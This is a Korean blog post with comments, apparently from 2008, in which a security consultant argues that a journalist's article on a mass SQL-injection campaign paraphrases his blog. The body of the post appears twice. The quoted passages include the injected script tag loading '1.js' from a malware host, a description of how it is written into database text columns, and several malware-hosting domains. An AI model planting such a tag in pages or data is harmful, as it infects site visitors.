서명덕 기자의 "경찰서·지자체까지…그들은 해킹에 무기력했다" 라는 기사가 참 묘하군요.
전체적인 문장 배치에 따른 논리 전개, 참고로 사용된 링크들, 일부 문장(특히 '구글에서 .kr 로 뒤져보면 몇 건이 나오더라' 하는 부분, 구글에서 자신의 사이트의 피해 여부를 확인하는 방법에 대한 안내 문구, 정부 측에서 해당 URL 로의 접근을 막아놨다는 문구) 등을 보면 제 블로그에 올라온 http://swbae.egloos.com/1747128 글을 중심으로, http://swbae.egloos.com/1748837 글의 내용을 짜깁기해 작성한 것이 아닐까 하는 심증이 강하게 드는데... 한편으론, 완전히 베낀 문장 자체는 없기에 표절이라고 하기는 어려운 ... 묘한 구석이 있네요.
더우기 기사 작성 며칠 전에 위의 두 개의 글에 서명덕 기자께서 트랙백을 다신 것이 이러한 심증을 뒷받침해줍니다.
기사 작성 전에 본인에게 '00님의 글을 모티브로 해서 기사를 작성하려고 한다.'라거나, '00님의 글 중 이러이러한 부분을 기사에 발췌하여 사용하고 싶다.' 라고, 최소한 전화나 메일로 양해를 구했어야 하는게 아닌지...
--- 추가 ---
roorie 님에 대한 답변이 너무 길어서 본글에 추가로 적습니다.
해외에서는 현재 1.js 를 주로 추적하고 있습니다. 0.js 는 올해 1월에 이미 http://www.modsecurity.org/blog/archives/2008/01/sql_injection_a.html 에서 이슈화가 되었기 때문에 해외에선 관심을 두고 있지 않습니다.
동일 공격 기법이 0.js, 1.js, fuckjp.js 의 몇 가지 다른 유형으로 삽입된다는 글은 구글을 뒤져보시면 아시겠지만, 전세계에서 제 블로그에만 유일하게 나오는 내용입니다.
제 블로그의 글과 기자분의 글을 출력해서 side-by-side 로 비교해보시면 보다 정확히 아실 수 있습니다.
1. 제 블로그에는
"그러면 간단한 구글 키워드를 이용해 자신이 운영하는 서버가 피해를 입었는지 파악하는 방법을 알려드리겠습니다.
여러분이 운영하는 서버가 예를 들어 example.co.kr 이라면 구글에서
1. site:example.co.kr 0.js
2. site:example.co.kr 1.js
3. site:example.co.kr fuckjp.js
라는 키워드로 검색해보세요." 라는 내용이 나옵니다.
서명덕 기자의 글에는
"특정 웹사이트(예를 들어 abcde.com)의 공격 여부를 확인하기 위해서는 검색 창에서 ‘site:abcde.com 0.js’‘site:abcde.com 1.js’ ‘site:abcde.co.kr fuckjp.js’ 라고 입력하면 된다." 라는 내용이 나옵니다.
example.co.kr 을 abcde.com 으로 바꾸기만 한 것을 알 수 있습니다. 마지막 부분의 fuckjp.js는 example 을 abcde 로 바꾸었으나, co.kr 은 .com 으로 바꾸지 못하는 실수도 했네요.
2. 제 블로그에는
"이 공격에 주로 사용되는 도메인으로 위의 자료에선 nmidahena.com, aspder.com, nihaorr1.com 가거론되고 있습니다만, 그 외에도 yl18.net, rnmb.net, t.uc8010.com 등이 악성코드 호스팅 서버로 이용되고있습니다", "현재 정부 산하 보안 관련 기관과 ISP 가 공조해 악성코드 호스팅 서버로의 접속을 막고 있기 때문에, 일반인의 직접적인 피해규모는 적은 상태입니다만," 이라는 내용이 나옵니다.
서명덕 기자의 글에는 "악성 코드를 유포하는 곳은 대부분 nihaorr1.com , haoliuliang.net , 2117.net , 2117966.net 등으로 불리는 중국 발 도메인이다. 관계 당국에서도 이러한 해외 보안 보고서를 파악하고 네트워크 단에서 트래픽을 차단하고 있는 것으로 알려졌다." 라는 내용이 나옵니다.
참고로 217966.net 은 제 글 중에 그림으로 나옵니다.
3. 제 블로그에는
"모두 공통적으로 <script src="http://악성코드 호스팅 서버/자바스크립트"> 형태의 소스가 삽입된 것을 보실 수 있습니다." 라는 내용이 나옵니다.
서명덕 기자의 글에는
"해킹을 당한 웹사이트들은 공통적으로 <script src="http://악성코드 배포 웹사이트/악성코드가 담긴 자바스크립트"> 형태의 소스가 마구잡이로 삽입되어 있다." 라는 내용이 나옵니다.
4. 제 블로그에는
"홈페이지 변조를 통해 악성코드 링크를 삽입한게 아니라, SQL injection 기법을 이용해 DB 컨텐츠에 삽입한 것입니다.", "공격 방식의 특성 상 사이트 DB 내의 데이터가 깨지게 되기 때문에 서버 관리자, 보안 담당자의 관심과 주의가 필요하다고 하겠습니다." 라는 내용이 나옵니다.
서명덕 기자의 글에는
"특히 홈페이지 변조가 아니라 데이터베이스 데이터를 직접 건드린다는 점에서 서버 관리자의 각별한 주의가 필요하다" 라는 내용이 나옵니다.
5. 제 블로그에는
"가장 피해 규모가 큰 것은 1.js 입니다.
미국 구글 서치 엔진에서 co.kr 도메인에 대해서만 1.js 가 삽입된 사이트를 뒤져보면, 7,770 개의 결과가 나옵니다. go.kr 이나 or.kr, com 등 다른 사이트까지 고려하면 이보다 몇 배의 숫자가 되겠죠.
그 다음으로 피해 규모가 큰 것은 fuckjp.js 입니다.
역시 같은 방식으로 검색해보면 5,120 개의 결과가 나옵니다.
0.js 는 비교적 늦게 공격에 뛰어든 편인데, site:co.kr net/0.js 로 검색하면 4,770 개의 결과가 나옵니다.
site:co.kr com/0.js 으로 검색해도 몇 건이 나오구요." 라는 내용이 나옵니다.
서명덕 기자의 글에는
"닷케이알(.co.kr) 도메인을 사용하는 한국 사이트를 조사해 본 결과, 악성 코드를 유포하는 자바스크립트인 ‘1.js’ 파일이임의 삽입된 곳 1만2600개로 가장 많았고, ‘fuckjp.js’ 파일과 ‘0.js’ 파일 공격은 각각 5200개와4900개에 달했다. 어림잡아 2만개가 넘는 웹사이트가 중국발 해킹에 무방비로 노출된 셈이다. 닷컴(.com) 도메인을 사용하는한국 웹사이트까지 조사한다면 피해는 기하급수적으로 늘어날 수밖에 없다." 라는 내용이 나옵니다.
구체적인 숫자에 서로 차이가 있는 것은 구글을 이용해 검색한 날짜가 서로 다르기 때문입니다.
6. 제 블로그에는
"봇넷 추적을 하는 쉐도우서버 그룹(관련글: http://swbae.egloos.com/1532843)에서 이번 공격에 대한 상세 분석 자료가 나왔습니다. 분석자료: http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424" 라는 내용이 나옵니다.
서명덕 기자의 글에는
"<script src=nihaorr1.com/1.js></script> 를 강제로 추가하는 것 같다" 라는 글에 링크로 http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424 를 달고 있습니다.
7. 제 블로그에는
"모든 사용자가 생성한 테이블을 찾아서 컬럼이 문자형(nvarchar text ntext varchar)인 경우 <script src=nihaorr1.com/1.js></script> 를 추가시킵니다.
이렇게 되면 문자형 데이터에 위 스크립트가 추가 됩니다." 라는 다른 전문가의 말을 인용한 문장이 등장합니다.
서명덕 기자의 글에는
"DB 테이블 중에서 텍스트 형태로 된 칼럼을 찾아서 <script src=nihaorr1.com/1.js></script> 를 강제로 추가하는 것 같다" 라는 보안 전문가의 말을 인용한 문장이 나옵니다.
해외 사이트에는 0.js, 1.js, fuckjp.js 를 연관지어 분석한 글이 올라와 있지 않기 때문에, 서기자님이 해외 사이트를 참조하지 않은 것은 분명합니다. 그리고 위의 7 가지 구체적인 문장, 그리고 전반적인 글의 논리 전개 방식을 보면 서기자님의 글과, 제 글이 우연이라기엔 너무 유사하지 않습니까?
--- 추가 ---
제가 화가 난 사유는 다른게 아니라, 현재 위의 기사에 대한 항의 전화가 저한테 오고 있습니다. 다들 며칠 전의 글을 떠올리면서 분명 제가 서명덕 기자에게 기사를 제보했다고 생각하고 있는 것이죠. 컨설턴트는 "웹 사이트를 걸레로 만든다는 표현도 가능할 것 같다." 같은 저급한 표현을 사용하지 않습니다. 제가 하지도 않은 일에 대해 비난을 받으면서, 저 자신을 방어하고자 하는게 제가 글을 올리게된 가장 큰 이유입니다.
전체적인 문장 배치에 따른 논리 전개, 참고로 사용된 링크들, 일부 문장(특히 '구글에서 .kr 로 뒤져보면 몇 건이 나오더라' 하는 부분, 구글에서 자신의 사이트의 피해 여부를 확인하는 방법에 대한 안내 문구, 정부 측에서 해당 URL 로의 접근을 막아놨다는 문구) 등을 보면 제 블로그에 올라온 http://swbae.egloos.com/1747128 글을 중심으로, http://swbae.egloos.com/1748837 글의 내용을 짜깁기해 작성한 것이 아닐까 하는 심증이 강하게 드는데... 한편으론, 완전히 베낀 문장 자체는 없기에 표절이라고 하기는 어려운 ... 묘한 구석이 있네요.
더우기 기사 작성 며칠 전에 위의 두 개의 글에 서명덕 기자께서 트랙백을 다신 것이 이러한 심증을 뒷받침해줍니다.
기사 작성 전에 본인에게 '00님의 글을 모티브로 해서 기사를 작성하려고 한다.'라거나, '00님의 글 중 이러이러한 부분을 기사에 발췌하여 사용하고 싶다.' 라고, 최소한 전화나 메일로 양해를 구했어야 하는게 아닌지...
--- 추가 ---
roorie 님에 대한 답변이 너무 길어서 본글에 추가로 적습니다.
해외에서는 현재 1.js 를 주로 추적하고 있습니다. 0.js 는 올해 1월에 이미 http://www.modsecurity.org/blog/archives/2008/01/sql_injection_a.html 에서 이슈화가 되었기 때문에 해외에선 관심을 두고 있지 않습니다.
동일 공격 기법이 0.js, 1.js, fuckjp.js 의 몇 가지 다른 유형으로 삽입된다는 글은 구글을 뒤져보시면 아시겠지만, 전세계에서 제 블로그에만 유일하게 나오는 내용입니다.
제 블로그의 글과 기자분의 글을 출력해서 side-by-side 로 비교해보시면 보다 정확히 아실 수 있습니다.
1. 제 블로그에는
"그러면 간단한 구글 키워드를 이용해 자신이 운영하는 서버가 피해를 입었는지 파악하는 방법을 알려드리겠습니다.
여러분이 운영하는 서버가 예를 들어 example.co.kr 이라면 구글에서
1. site:example.co.kr 0.js
2. site:example.co.kr 1.js
3. site:example.co.kr fuckjp.js
라는 키워드로 검색해보세요." 라는 내용이 나옵니다.
서명덕 기자의 글에는
"특정 웹사이트(예를 들어 abcde.com)의 공격 여부를 확인하기 위해서는 검색 창에서 ‘site:abcde.com 0.js’‘site:abcde.com 1.js’ ‘site:abcde.co.kr fuckjp.js’ 라고 입력하면 된다." 라는 내용이 나옵니다.
example.co.kr 을 abcde.com 으로 바꾸기만 한 것을 알 수 있습니다. 마지막 부분의 fuckjp.js는 example 을 abcde 로 바꾸었으나, co.kr 은 .com 으로 바꾸지 못하는 실수도 했네요.
2. 제 블로그에는
"이 공격에 주로 사용되는 도메인으로 위의 자료에선 nmidahena.com, aspder.com, nihaorr1.com 가거론되고 있습니다만, 그 외에도 yl18.net, rnmb.net, t.uc8010.com 등이 악성코드 호스팅 서버로 이용되고있습니다", "현재 정부 산하 보안 관련 기관과 ISP 가 공조해 악성코드 호스팅 서버로의 접속을 막고 있기 때문에, 일반인의 직접적인 피해규모는 적은 상태입니다만," 이라는 내용이 나옵니다.
서명덕 기자의 글에는 "악성 코드를 유포하는 곳은 대부분 nihaorr1.com , haoliuliang.net , 2117.net , 2117966.net 등으로 불리는 중국 발 도메인이다. 관계 당국에서도 이러한 해외 보안 보고서를 파악하고 네트워크 단에서 트래픽을 차단하고 있는 것으로 알려졌다." 라는 내용이 나옵니다.
참고로 217966.net 은 제 글 중에 그림으로 나옵니다.
3. 제 블로그에는
"모두 공통적으로 <script src="http://악성코드 호스팅 서버/자바스크립트"> 형태의 소스가 삽입된 것을 보실 수 있습니다." 라는 내용이 나옵니다.
서명덕 기자의 글에는
"해킹을 당한 웹사이트들은 공통적으로 <script src="http://악성코드 배포 웹사이트/악성코드가 담긴 자바스크립트"> 형태의 소스가 마구잡이로 삽입되어 있다." 라는 내용이 나옵니다.
4. 제 블로그에는
"홈페이지 변조를 통해 악성코드 링크를 삽입한게 아니라, SQL injection 기법을 이용해 DB 컨텐츠에 삽입한 것입니다.", "공격 방식의 특성 상 사이트 DB 내의 데이터가 깨지게 되기 때문에 서버 관리자, 보안 담당자의 관심과 주의가 필요하다고 하겠습니다." 라는 내용이 나옵니다.
서명덕 기자의 글에는
"특히 홈페이지 변조가 아니라 데이터베이스 데이터를 직접 건드린다는 점에서 서버 관리자의 각별한 주의가 필요하다" 라는 내용이 나옵니다.
5. 제 블로그에는
"가장 피해 규모가 큰 것은 1.js 입니다.
미국 구글 서치 엔진에서 co.kr 도메인에 대해서만 1.js 가 삽입된 사이트를 뒤져보면, 7,770 개의 결과가 나옵니다. go.kr 이나 or.kr, com 등 다른 사이트까지 고려하면 이보다 몇 배의 숫자가 되겠죠.
그 다음으로 피해 규모가 큰 것은 fuckjp.js 입니다.
역시 같은 방식으로 검색해보면 5,120 개의 결과가 나옵니다.
0.js 는 비교적 늦게 공격에 뛰어든 편인데, site:co.kr net/0.js 로 검색하면 4,770 개의 결과가 나옵니다.
site:co.kr com/0.js 으로 검색해도 몇 건이 나오구요." 라는 내용이 나옵니다.
서명덕 기자의 글에는
"닷케이알(.co.kr) 도메인을 사용하는 한국 사이트를 조사해 본 결과, 악성 코드를 유포하는 자바스크립트인 ‘1.js’ 파일이임의 삽입된 곳 1만2600개로 가장 많았고, ‘fuckjp.js’ 파일과 ‘0.js’ 파일 공격은 각각 5200개와4900개에 달했다. 어림잡아 2만개가 넘는 웹사이트가 중국발 해킹에 무방비로 노출된 셈이다. 닷컴(.com) 도메인을 사용하는한국 웹사이트까지 조사한다면 피해는 기하급수적으로 늘어날 수밖에 없다." 라는 내용이 나옵니다.
구체적인 숫자에 서로 차이가 있는 것은 구글을 이용해 검색한 날짜가 서로 다르기 때문입니다.
6. 제 블로그에는
"봇넷 추적을 하는 쉐도우서버 그룹(관련글: http://swbae.egloos.com/1532843)에서 이번 공격에 대한 상세 분석 자료가 나왔습니다. 분석자료: http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424" 라는 내용이 나옵니다.
서명덕 기자의 글에는
"<script src=nihaorr1.com/1.js></script> 를 강제로 추가하는 것 같다" 라는 글에 링크로 http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424 를 달고 있습니다.
7. 제 블로그에는
"모든 사용자가 생성한 테이블을 찾아서 컬럼이 문자형(nvarchar text ntext varchar)인 경우 <script src=nihaorr1.com/1.js></script> 를 추가시킵니다.
이렇게 되면 문자형 데이터에 위 스크립트가 추가 됩니다." 라는 다른 전문가의 말을 인용한 문장이 등장합니다.
서명덕 기자의 글에는
"DB 테이블 중에서 텍스트 형태로 된 칼럼을 찾아서 <script src=nihaorr1.com/1.js></script> 를 강제로 추가하는 것 같다" 라는 보안 전문가의 말을 인용한 문장이 나옵니다.
해외 사이트에는 0.js, 1.js, fuckjp.js 를 연관지어 분석한 글이 올라와 있지 않기 때문에, 서기자님이 해외 사이트를 참조하지 않은 것은 분명합니다. 그리고 위의 7 가지 구체적인 문장, 그리고 전반적인 글의 논리 전개 방식을 보면 서기자님의 글과, 제 글이 우연이라기엔 너무 유사하지 않습니까?
--- 추가 ---
제가 화가 난 사유는 다른게 아니라, 현재 위의 기사에 대한 항의 전화가 저한테 오고 있습니다. 다들 며칠 전의 글을 떠올리면서 분명 제가 서명덕 기자에게 기사를 제보했다고 생각하고 있는 것이죠. 컨설턴트는 "웹 사이트를 걸레로 만든다는 표현도 가능할 것 같다." 같은 저급한 표현을 사용하지 않습니다. 제가 하지도 않은 일에 대해 비난을 받으면서, 저 자신을 방어하고자 하는게 제가 글을 올리게된 가장 큰 이유입니다.
덧글
희야♡ 2008/05/02 00:10 # 답글
그 기사 보면서 헐랭이님 글 생각이 딱 나긴 하더군요...
jinaida 2008/05/02 00:26 # 답글
공감!!! 느낌은 팍오는데 ..
mat 2008/05/02 09:25 # 삭제 답글
해당 내용은 이미 3월부터 알려진 것들입니다.http://bugtruck.tistory.com/86
별로 최신 정보도 아니죠.
헐랭이 2008/05/02 09:49 # 답글
네, 말씀하신 대로 최신 정보가 아닙니다. 원문을 보면 저 역시 2~3개월 전부터 발생했던 일이라고 쓰고 있습니다.논쟁의 쟁점은 이 정보가 최신 정보냐가 아니라, 서명덕 기자가 표절을 해서 기사를 작성했느냐 입니다.
서명덕 기자는 이전에도 표절 논쟁이 크게 벌어진 사례가 있습니다.
참고 자료 : http://dobiz.tistory.com/41
위의 표절 논쟁과 이번 사건을 보면 서명덕 기자는 기사를 작성할 때
1. 일단 기사 작성의 뼈대가 될만한 블로그 글을 봐둔다.
2. 원 문장을 그대로 사용하면 표절 논쟁이 벌어지므로, 기존 문장의 단어 몇 개, 조사 몇 개를 적절히 바꾼다.
3. 전체적인 문장 배치를 적절히 손보아 표절한 티가 안나게 한다.
4. 기사를 송고한다.
라는 형태로 기사를 작성한다는 것을 알 수 있습니다.
더우기 기존에 표절 논쟁이 있음에도, 역시 표절 습관을 못버렸다는 것은 본인이 전혀 반성하지 못하고 있다는 뜻이며, 앞으로도 다른 블로그에서 쓸만한 글을 보면 짜깁기 능력을 이용해 표절 기사를 올릴 수 있다는 뜻입니다
ww0jeff 2008/05/02 10:00 # 삭제 답글
벌써 글 올리셨네요.전 어제 기사보면서 헐랭이님의 머리속을 따라 걷는 느낌이었습니다. 물론 최근들어 해외기사나 동향에 정보가 많이 공개되서 단순기사번역은 아닌가 생각도 들긴 했습니다만 의심이 들더군요.
그건 그렇고 전 작년 연말연시때부터 할일이 없어 isc 에 글 유심히 보면 시간떼우고 있었는데요. 말씀하신 대로 대규모 공격 있기전에 움직임이 감지되기 시작한 것 맞습니다. 좀 1월 9일자로 좀 자세한 얘기가 올라왔구요. 강의할때 계속 언급을 해오고 있긴 했습니다만..
여튼, 서기자님의 답변을 저도 기다려봅니다. 급히나가봐야 해서 이만..
2008/05/02 10:19 # 삭제 답글 
비공개 덧글입니다.
헐랭이 2008/05/02 10:52 # 답글
익명님// 좋은 지적 감사합니다. 말씀하신 내용을 반영하였습니다.제가 불합리한 일을 워낙 싫어하다보니, 흥분하여 자극적인 문장 선택이 이루어진 것 같습니다.
roorie 2008/05/02 13:58 # 삭제 답글
글쎄요 제가 봤을 때는 서명덕 기자 글의 어느 부분이 헐랭이님 글을 표절한 것인지 전혀 감이 와닿지 않는데요. SQL 인젝션 공격에 관한 글들은 이미 해외 뉴스와 블로그에서 아주 자세히 다루고 있어서 헐랭이님 글을 굳이 표절할 이유가 없는 것 같은데...
ged 2008/05/02 14:13 # 삭제 답글
전 "업계전문가" 가 헐랭이님인줄 알았다는.. 서기자님께서 업계전문가를 밝히시면 되겠네요.
헐랭이 2008/05/02 14:36 # 답글
저는 서기자님과 인터뷰를 한적이 없습니다.
ferguson 2008/05/02 14:47 # 삭제 답글
서명덕 기자 어떻게 보면 참 한심하기 짝이 없군요 -.-
2008/05/12 15:28 # 삭제 답글 
비공개 덧글입니다.